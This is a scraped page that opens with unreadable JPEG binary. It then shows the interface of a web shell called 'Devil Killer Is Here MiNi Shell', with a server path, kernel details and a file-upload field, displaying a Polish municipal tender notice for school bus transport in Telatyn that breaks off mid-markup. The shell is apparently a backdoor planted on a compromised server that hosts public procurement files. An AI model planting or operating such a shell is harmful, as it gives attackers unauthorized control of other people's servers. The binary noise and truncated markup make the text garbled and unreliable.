JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240814/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240814/0045736701-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Dowóz uczniów do Szkoły Podstawowej w Telatynie w roku szkolnym 2024-2025 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA TELATYN UL. FRYDERYKA CHOPINA 10 22-652 TELATYN</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 950368990</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">UL. FRYDERYKA CHOPINA 10</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Telatyn</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">22-652</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL812 - Chełmsko-zamojski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@telatyn.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.ugtelatyn.bip.lubelskie.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dowóz uczniów do Szkoły Podstawowej w Telatynie w roku szkolnym 2024-2025 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9d75860e-3490-4b39-b52b-391fc6d1f877</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00457367</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-08-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00013277/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Dowóz uczniów do Szkoły Podstawowej w Telatynie w roku szkolnym 2024 - 2025</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://telatyn.ezamawijący.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym a<br/>Wykonawcami odbywa się przy użyciu Platformy zakupowej: https://telatyn.ezamawijacy.pl lub poczty elektronicznej email:<br/>zamowienia@telatyn.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">11.1. W postępowaniu o udzielenie<br/>zamówienia komunikacja pomiędzy Zamawiającym, a Wykonawcami odbywa się przy użyciu Platformy zakupowej:<br/>https://telatyn.ezamawiajacy.pl lub poczty elektronicznej: zamowienia@telatyn.pl, z zastrzeżeniem pkt. 11.15 SWZ.<br/>11.2. Zamawiający wyznacza następujące osoby do kontaktu z Wykonawcami:<br/>Stanisław Litkowiec, tel. +48 (84) 6613110, e-mail: zamowienia@telatyn.pl<br/>11.3. Oświadczenia, wnioski, zawiadomienia lub informacje, które wpłyną do Zamawiającego, uważa się za dokumenty złożone w<br/>terminie, jeśli ich czytelna treść dotrze do Zamawiającego przed upływem tego terminu. Za datę wpływu oświadczeń, wniosków,<br/>zawiadomień oraz informacji przekazywanym na adres e-mail Zamawiającego przyjmuje się datę zapisu wiadomości na serwerze<br/>odbiorczym. W przypadku skorzystania z Platformy za datę wpływu oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje<br/>się datę ich rejestracji na Platformie.<br/>11.4. Zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu<br/>na subdomenie Gminy Telatyn: https://telatyn.ezamawiajacy.pl lub https://oneplace.marketplanet.pl.<br/>11.5. Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl,<br/>gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując<br/>kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje<br/>regulamin, klika polecenie „zarejestruj się”.<br/>11.6. Rejestracja Wykonawcy trwa maksymalnie do 6 godzin. W związku z tym Zamawiający zaleca Wykonawcom uwzględnienie<br/>czasu niezbędnego na rejestrację w procesie złożenia Oferty w postaci elektronicznej. Wykonawca wraz z potwierdzeniem złożenia<br/>wniosku rejestracyjnego otrzyma informacje, o możliwości przyspieszenia procedury założenia konta, wówczas należy skontaktować<br/>się pod numerem telefonu podanym w ww. potwierdzeniu.<br/>11.7. Po założeniu konta Wykonawca ma możliwość złożenia Oferty w postępowaniu. Komunikacja między Zamawiającym a<br/>Wykonawcami, w szczególności zawiadomienia oraz informacje, przekazywane są w formie elektronicznej za pośrednictwem<br/>Platformy Zakupowej. Za datę przekazania zaświadczeń oraz informacji przyjmuje się datę ich wysłania za pośrednictwem zakładki<br/>„Korespondencja”.<br/>11.16. Ofertę należy sporządzić w języku polskim.<br/>11.17. Ofertę składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem<br/>zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">RODO (obowiązek informacyjny): Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych)<br/>(Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający<br/>informuje, że:<br/>1) jest administratorem danych osobowych Wykonawcy oraz osób, których dane Wykonawca przekazał w niniejszym postępowaniu;<br/>2) dane osobowe Wykonawcy przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego na zadanie pn.: „Termomodernizacja budynków użyteczności publicznej” prowadzonym w trybie<br/>podstawowym;<br/>3) odbiorcami danych osobowych Wykonawcy będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania<br/>w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (Dz. U. z 2023 r. poz. 1605 z późn.<br/>zm.), dalej „ustawa Pzp”;<br/>4) dane osobowe Wykonawcy będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, w sposób gwarantujący jego nienaruszalność.<br/>5) obowiązek podania przez Wykonawcę danych osobowych bezpośrednio go dotyczących jest wymogiem ustawowym określonym<br/>w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania<br/>określonych danych wynikają z ustawy Pzp;<br/>6) w odniesieniu do danych osobowych Wykonawcy decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art.<br/>22 RODO; 7) Wykonawca posiada:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych dotyczących Wykonawcy;<br/>− na podstawie art. 16 RODO prawo do sprostowania danych osobowych, o ile ich zmiana nie skutkuje zmianą wyniku postępowania<br/>o udzielenie zamówienia<br/>publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie narusza integralności protokołu oraz<br/>jego załączników;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy Wykonawca uzna, że przetwarzanie jego<br/>danych osobowych narusza przepisy RODO;<br/>8) Wykonawcy nie przysługuje:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>danych osobowych Wykonawcy jest art. 6 ust. 1 lit. c RODO.<br/>W przypadku, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 rozporządzenia 2016/679, wymagałoby<br/>niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji<br/>mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia<br/>publicznego lub konkursu.<br/>Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym mowa<br/>w art. 16 rozporządzenia 2016/679, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego lub<br/>konkursu ani zmianą postanowień umowy w zakresie niezgodnym z ustawą.<br/>Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych<br/>do czasu zakończenia postępowania o udzielenie zamówienia publicznego lub konkursu.<br/>W przypadku danych osobowych zamieszczonych przez Zamawiającego w Biuletynie Zamówień Publicznych, prawa, o których<br/>mowa w art. 15 i art. 16 rozporządzenia 2016/679, są wykonywane w drodze żądania skierowanego do Zamawiającego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">KNR.271.14.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest świadczenie usług w zakresie dowożenia uczniów z miejsca zamieszkania do Szkoły<br/>Podstawowej i Przedszkola w Telatynie oraz ich odwiezienie do miejsca zamieszkania w roku szkolnym 2024/2025 we<br/>wszystkie dni realizacji zajęć szkolnych. Dowóz uczniów obejmuje okres od 2 września 2024r. do ostatniego dnia nauki<br/>szkolnej w roku szkolnym 2024/2025. Przewozy realizowane będą w dni robocze w ciągu roku szkolnego 2024/2025 z<br/>wyłączeniem wakacji, ferii, przerw świątecznych, dni wolnych od zajęć oraz dni, w których zajęcia nie będą odbywały się z<br/>powodu okoliczności związanych z wystąpieniem epidemii lub stanu zagrożenia epidemicznego, w tym m. in. w przypadku<br/>zdalnego nauczania. W przypadku odpracowywania zajęć szkolnych w innym dniu wolnym od zajęć, Wykonawca<br/>zobowiązany będzie zapewnić przewóz uczniom i dzieciom zgodnie z ustaleniami z Dyrektorem Szkoły Podstawowej w<br/>Telatynie.<br/>2. Wykonawca zobowiązuje się do punktualnego przewozu uczniów do Szkoły Podstawowej w Telatynie.<br/>3. Wykaz miejscowości, z których i do których realizowane będzie dowożenie uczniów, ilość uczniów, godziny dojazdu i<br/>odjazdu określa szczegółowo projekt harmonogramu dziennego dowożenia uczniów na rok szkolny 2024/2025 stanowiący<br/>załącznik nr 1 do SWZ.<br/>4. Zamawiający zastrzega sobie prawo o ile zajdą takie okoliczności zmiany w trakcie roku szkolnego harmonogramu<br/>dziennego dowożenia uczniów w zakresie liczby uczniów, przebiegu trasy, długości trasy, godziny przyjazdu i odjazdu,<br/>zmiany lokalizacji przystanków na wszystkich trasach po uprzednim powiadomieniu Wykonawcy<br/>o zamierzonej zmianie w terminie umożliwiającym uzyskanie stosownych zezwoleń przed terminem dokonania zmiany.<br/>5. Przewozy odbywać się będą w ramach publicznego transportu zbiorowego autobusowego w komunikacji zwykłej.<br/>Wykonawca może, w przypadku wolnych miejsc przewozić także osoby trzecie.<br/>6. Listę uczniów, którzy zostaną objęci dowożeniem w ramach niniejszej umowy, Zamawiający przedłoży Wykonawcy przed<br/>rozpoczęciem wykonywania usługi. Lista ta stanowi podstawę naliczania przez wykonawcę wynagrodzenia. Lista będzie<br/>aktualizowana przez zamawiającego stosownie do zaistniałych zmian. (w szczególności w przypadku zmiany liczby<br/>dowożonych dzieci na skutek ograniczeń związanych z pandemią). 7. Wykonawca Usługi przewozić będzie uczniów środkami transportu do tego przeznaczonymi i spełniającymi wymagane<br/>warunki techniczne do przewozu grup dzieci i młodzieży (wymagane 3 pojazdy), nie starszymi niż z 2005 r. (rok produkcji<br/>środka transportu).<br/>8. Wykonawca Usługi przewozić będzie uczniów w liczbie nie większej niż dopuszczona liczba osób w dowodzie<br/>rejestracyjnym pojazdu.<br/>9. Wykonawca jest obowiązany posiadać aktualne badania techniczne i wymagane ubezpieczenia pojazdów. Oprócz<br/>ubezpieczenia pojazdów uczestniczących w dowozach Wykonawca zobowiązany jest ubezpieczyć również przewożone w<br/>ramach umowy osoby od następstw nieszczęśliwych wypadków oraz polisy ubezpieczeniowej OC przez cały okres<br/>obowiązywania umowy.<br/>10. W razie uszkodzenia lub awarii pojazdu wykonującego przewóz, Wykonawca zobowiązuje się podstawić autobus<br/>zastępczy spełniający właściwe wymagania<br/>w ruchu drogowym w czasie nie dłuższym niż 70 minut.<br/>11. Do czasu rozpoczęcia usług Wykonawca zobowiązany jest do uzyskania wszystkich wymaganych prawem zezwoleń<br/>wynikających z ustawy o transporcie drogowym.<br/>12. Z przejazdu autobusem będą mogli korzystać inni pasażerowie na zasadach obowiązujących w regularnej komunikacji<br/>autobusowej w miarę posiadania wolnych miejsc w autobusie.<br/>13. Zamawiający, poprzez wyznaczone osoby, ma prawo kontrolować, czy przewozy są wykonywane pojazdami<br/>spełniającymi wymagania wynikające z niniejszej umowy,<br/>w szczególności ma prawo sprawdzać; czy w okresach niskich temperatur pojazdy są ogrzewane i jaka panuje w nich<br/>temperatura, ma prawo żądać od kierowcy okazania dowodu rejestracyjnego pojazdu i sprawdzać rok produkcji pojazdów, a<br/>Wykonawca jest zobowiązany umożliwić Zamawiającemu przeprowadzenie kontroli. Z kontroli Zamawiający sporządza<br/>protokół, który przekazuje Wykonawcy w terminie 5 dni roboczych. Wykonawca ma prawo ustosunkować się do protokołu w<br/>terminie 5 dni roboczych. W wyniku przeprowadzonej kontroli i stwierdzenia naruszenia postanowień umowy w zakresie nie<br/>dostosowania środków transportu do wymogów określonych<br/>w niniejszej umowie Zamawiający może odstąpić od umowy.<br/>14. Kierowcy autobusów muszą posiadać wszystkie uprawnienia wynikające z przepisów prawa.<br/>15. Wykonawca gwarantuje, że przewóz uczniów będzie wykonywany zgodnie<br/>z przepisami prawa dotyczącego ruchu drogowego i przewozu osób, w szczególności zapewni, że środki transportu<br/>przewożące dzieci i młodzież nie będą przepełnione (tj. nie będą przewoziły więcej pasażerów niż jest to dopuszczone dla<br/>danego pojazdu).<br/>16. Wykonawca nie może powierzyć części lub całości zamówienia podwykonawcom bez pisemnej zgody Zamawiającego.<br/>17. Wykonawca oświadcza, iż osoby, które będą wykonywały w trakcie realizacji niniejszej umowy czynności w zakresie<br/>dowozu dzieci do szkół - jeżeli wykonywanie tych czynności polegać będzie w przypadku danego wykonawcy na<br/>wykonywaniu pracy w rozumieniu przepisów kodeksu pracy będą zatrudnione na podstawie umowy o pracę.<br/>18. Zamawiający zastrzega możliwość ograniczenia zakresu usługi, a w konsekwencji również całkowitego wynagrodzenia<br/>określonego w umowie. Ograniczenie przez Zamawiającego zakresu przedmiotu zamówienia nie stanowi niewykonania lub<br/>nienależytego wykonania zobowiązania. Wykonawcy nie przysługuje wówczas prawo do żądania wynagrodzenia za<br/>zaniechany zakres usług.<br/>Szacunkowa liczba uczniów objętych dowożeniem na wszystkich trasach – 147.<br/>Ilości podane wyżej mogą ulec zmianie w zależności od decyzji rodziców dot. wyboru szkoły<br/>oraz formy dowozu uczniów.<br/>Rzeczywista liczba uczniów objętych dowozem w ramach niniejszego zamówienia, czyli<br/>faktyczna liczba biletów miesięcznych będzie wynikała z sytuacji<br/>demograficznej, organizacji sieci szkół oraz obowiązujących przepisów prawa (np. objęcie<br/>dowozem lub wyłączenie z dowozu określonych grup uczniów) przy czym zakłada<br/>się, że liczba uczniów objętych przewozem może zmienić się w granicach + \ - 10 %.<br/>Zamawiający zastrzega sobie prawo do zmiany ilości przewożonych uczniów, zmiany<br/>przebiegu trasy, długości trasy, godzin dowozu i odwozu uczniów, zmiany lokalizacji<br/>przystanków o ile zajdą takie okoliczności np. po zatwierdzeniu planu zajęć przez dyrektorów<br/>szkół.<br/>Powyższe zmiany nie spowodują zmiany wartości jednostkowej biletu miesięcznego dla danej<br/>długości trasy dowozu ucznia wymienionej w Formularzu Cenowym- zał. Nr 1a<br/>oferty Wykonawcy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60112000-6 - Usługi w zakresie publicznego transportu drogowego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">60100000-9 - Usługi w zakresie transportu drogowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-09-02 do 2025-06-27</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">17.1 Zamawiający dokona oceny ofert, które nie zostały odrzucone, na podstawie następujących<br/>kryteriów oceny ofert:<br/>Lp. Nazwa kryterium Znaczenie kryterium (w %)<br/>1 Cena (C) 60<br/>2 Czas podstawienia autobusu (TP) 40<br/>Zamawiający dokona oceny ofert przyznając punkty w ramach poszczególnych kryteriów oceny ofert, przyjmując zasadę, że 1% = 1<br/>punkt.<br/>17.2. Punkty za kryterium „Cena” zostaną obliczone według wzoru:<br/>Cn<br/>PC = ------- x 60 pkt<br/>Cb<br/>gdzie,<br/>PC - ilość punktów za kryterium cena,<br/>Cn - najniższa cena ofertowa spośród ofert nieodrzuconych,<br/>Cb – cena oferty badanej.<br/>W kryterium „Cena”, oferta z najniższą ceną otrzyma 60 punktów a pozostałe oferty po matematycznym przeliczeniu w odniesieniu<br/>do najniższej ceny odpowiednio mniej. Końcowy wynik powyższego działania zostanie zaokrąglony do dwóch miejsc po przecinku.<br/>17.3. Kryterium – czas podstawienia autobusu zastępczego – TP (liczone w minutach):<br/>do 70 minut – 0 pkt;<br/>do 60 minut – 10 pkt;<br/>do 50 minut – 20 pkt;<br/>do 40 minut – 30 pkt;<br/>do 30 minut – 40 pkt;<br/>UWAGA! Zaoferowany czas podstawienia pojazdu zastępczego nie może być krótszy niż<br/>30 minut i nie dłuższy niż 70 minut.<br/>W przypadku podania przez wykonawcę czasu dłuższego niż 70 minut Zamawiający uzna<br/>ofertę jako nie zgodną z SWZ. W przypadku nie wpisania przez Wykonawcę czasu w<br/>formularzu ofertowym, Zamawiający przyjmie do oceny maksymalny czas podstawienia<br/>pojazdu zastępczego tj. 70 minut.<br/>W przypadku podania przez wykonawcę czasu krótszego niż 30 minut, do oceny ofert<br/>zostanie przyjęta punktacja maksymalnej wysokości 40 pkt.<br/>3. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie<br/>liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki<br/>W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień<br/>dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>5. Maksymalna łączna liczba punktów (okres gwarancji i czas podstawienia autobusu<br/>zastępczego) jaką może uzyskać Wykonawca wynosi – 100 pkt.<br/>6. Za najkorzystniejszą zostanie wybrana oferta, która zgodnie z powyższymi kryteriami<br/>oceny ofert uzyska najwyższą liczbę punktów spośród ofert niepodlegających odrzuceniu.<br/>17.4 Za najwyżej ocenioną zostanie uznana oferta, która uzyskała najwyższą liczbę punktów – sumę punktów przyznanych w<br/>kryterium „C” + „TP” w oparciu o podane w ogłoszeniu o zamówieniu i niniejszej SWZ kryteria oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 